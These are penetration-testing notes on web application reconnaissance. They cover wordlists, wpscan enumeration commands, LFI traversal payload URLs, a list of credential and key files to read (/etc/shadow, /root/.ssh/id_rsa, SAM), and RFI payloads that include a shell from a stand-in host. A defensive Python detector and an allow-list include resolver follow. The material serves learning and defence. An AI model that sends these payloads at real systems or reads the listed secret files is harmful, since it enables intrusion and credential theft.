
Step 1: ALWAYS LOOK AT THE SOURCE CODE OF THE WEBPAGE!

Step 2:

Common Wordlists to use for Web App Scanning:

Common Wordlists to use for Web Directory Scanning:

Common Wordlists to use for User Enumeration Scanning:

  • /usr/share/seclists/Usernames
  • /usr/share/wordlists/dirbuster/apache-user-enum-2.0

Web App Scanners

Wpscan (WordPress Scanner):

  • wpscan --url
  • wpscan --url --enumerate ap,at (All Plugins, All Themes)
  • wpscan --url --enumerate u (Usernames)
  • wpscan --url --enumerate vp,vt (Vulnerable Plugins, Vulnerable Themes)

Other Tools:

  • Burp Suite
  • OWASP ZAP
  • Cadaver
  • SQLMap
  • Joomscan
  • Feroxbuster

Testing for LFI:

https://www.exploit-db.com/docs/english/40992-web-app-penetration-testing---local-file-inclusion-(lfi).pdf

Examples:

  • http://example.com/index.php?page=etc/passwd
  • http://example.com/index.php?page=etc/passwd%00
  • http://example.com/index.php?page=../../etc/passwd
  • http://example.com/index.php?page=%252e%252e%252f
  • http://example.com/index.php?page=....//....//etc/passwd

Interesting Files:

Linux:

/etc/passwd
/etc/shadow
/etc/issue
/etc/group
/etc/hostname
/etc/ssh/ssh_config
/etc/ssh/sshd_config
/root/.ssh/id_rsa
/root/.ssh/authorized_keys
/home/user/.ssh/authorized_keys
/home/user/.ssh/id_rsa

Windows:

/boot.ini
/autoexec.bat
/windows/system32/drivers/etc/hosts
/windows/repair/SAM

Testing for RFI:

  • http://example.com/index.php?page=http://callback.com/shell.txt
  • http://example.com/index.php?page=http://callback.com/shell.txt%00
  • http://example.com/index.php?page=http:%252f%252fcallback.com%252fshell.txt
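The LFI and RFI examples above all vary one parameter (`page`) in a few ways: a bare system path, a trailing null byte, plain `../` traversal, double URL encoding (`%252e` is `%2e` is `.`), nested `....//` that survives a single `../` strip, and a remote URL in place of a file name. The following Python is an added example, not code from the original notes: it shows how a defender would normalise the raw parameter the same way the application eventually will (decode until stable, unify slashes, collapse dot runs) so that all of these shapes classify as traversal, null-byte or remote-include attempts, and how the include itself should be resolved against an allow-list instead of a blacklist. The sample parameter values are constructed from the payload shapes on this page; the base directory `/var/www/pages` and the `ALLOWED_PAGES` set are assumptions for the demonstration.

```python
import os
import re
from urllib.parse import unquote

# Constructed sample values for the `page` parameter, mirroring the LFI/RFI
# shapes listed on this page (assumption: the app includes the named file).
SAMPLE_PAGE_VALUES = [
    "about",
    "etc/passwd",
    "etc/passwd%00",
    "../../etc/passwd",
    "%252e%252e%252f",
    "....//....//etc/passwd",
    "http://callback.com/shell.txt",
    "http:%252f%252fcallback.com%252fshell.txt",
]

# Sensitive path prefixes taken from the "Interesting Files" list above.
SENSITIVE_PREFIXES = ("etc/passwd", "etc/shadow", "etc/ssh/", "root/.ssh/",
                      "windows/", "boot.ini", "autoexec.bat")

# Assumed allow-list of includable pages for the hardened resolver.
ALLOWED_PAGES = {"home", "about", "contact"}


def fully_decode(value, max_rounds=3):
    """Percent-decode until the value stops changing, so double encoding
    (%252e -> %2e -> .) is seen as the character it will finally become."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_page_param(value):
    """Return 'rfi', 'lfi' or 'ok' for one raw `page` parameter value."""
    decoded = fully_decode(value)
    # A URL scheme (two or more letters before ':') means a remote include.
    if re.match(r"^[a-z][a-z0-9+.-]+:", decoded, re.IGNORECASE):
        return "rfi"
    # Null byte: classic attempt to truncate an appended suffix such as ".php".
    if "\x00" in decoded:
        return "lfi"
    normalized = decoded.replace("\\", "/")
    # Collapse runs of dots so "....//" (which a single "../" strip turns back
    # into "../") is judged like plain traversal. A genuine "..." file name
    # would also be flagged here, which is acceptable for detection.
    collapsed = re.sub(r"\.{2,}", "..", normalized)
    if ".." in collapsed.split("/"):
        return "lfi"
    # Bare references to known sensitive system files, with or without "/".
    if normalized.lstrip("/").lower().startswith(SENSITIVE_PREFIXES):
        return "lfi"
    return "ok"


def scan_samples():
    """Classify every constructed sample; useful as a quick self-check."""
    return {v: classify_page_param(v) for v in SAMPLE_PAGE_VALUES}


def resolve_include(page_value, base_dir="/var/www/pages"):
    """Hardened resolver: only allow-listed names, appended extension, and a
    containment check on the real path. Returns the path or None."""
    decoded = fully_decode(page_value)
    if decoded not in ALLOWED_PAGES:
        return None
    real_base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(real_base, decoded + ".php"))
    # Defence in depth: even an allow-listed name must stay under base_dir.
    if os.path.commonpath([candidate, real_base]) != real_base:
        return None
    return candidate


if __name__ == "__main__":
    for raw, verdict in scan_samples().items():
        print(f"{verdict:4}  {raw}")
    print(resolve_include("about"), resolve_include("../../etc/passwd"))
```

The detection half is what you would run over access-log query strings; the resolver half is the fix for the `index.php?page=` pattern itself, where an allow-list removes the need to enumerate every encoding trick.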

Resources